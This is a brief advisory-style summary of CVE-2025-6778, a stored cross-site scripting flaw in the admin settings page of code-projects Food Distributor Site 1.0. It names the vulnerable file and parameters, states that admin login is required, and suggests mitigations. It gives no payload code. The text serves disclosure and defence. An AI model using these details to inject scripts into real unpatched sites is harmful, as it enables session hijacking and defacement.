CVE-2025-6778

A Cross-Site Scripting (XSS) vulnerability exists in the code-projects Food Distributor Site 1.0. The issue is located in the /admin/save_settings.php file, where the site_phone, site_email, and address parameters are not properly sanitized before being stored or echoed back. This allows an attacker to inject arbitrary HTML or JavaScript code through these fields [1][2].

Exploitation requires an authenticated session with admin privileges, as the settings page is only accessible after login. The attack is performed via a POST request to save_settings.php with malicious payloads in the vulnerable parameters. The vendor's demonstration shows the request includes a valid PHPSESSID cookie, confirming the need for authentication [1][2]. The attack vector is remote, meaning an attacker can send the crafted request from any network location.

Successful exploitation leads to stored XSS, meaning the injected script is stored on the server and executed when an admin views the affected page. This could result in session hijacking, defacement, or redirection to malicious sites within the admin panel's context. Given the low CVSS score of 2.4, the impact is limited, likely due to the requirement for admin authentication.

As of the publication date, no official patch or workaround has been provided by the vendor. The vulnerability details have been publicly disclosed, and the vendor's site (code-projects.org) offers the software for download but does not mention any updates [3]. Users should consider input validation and output encoding as mitigations if customizing the code.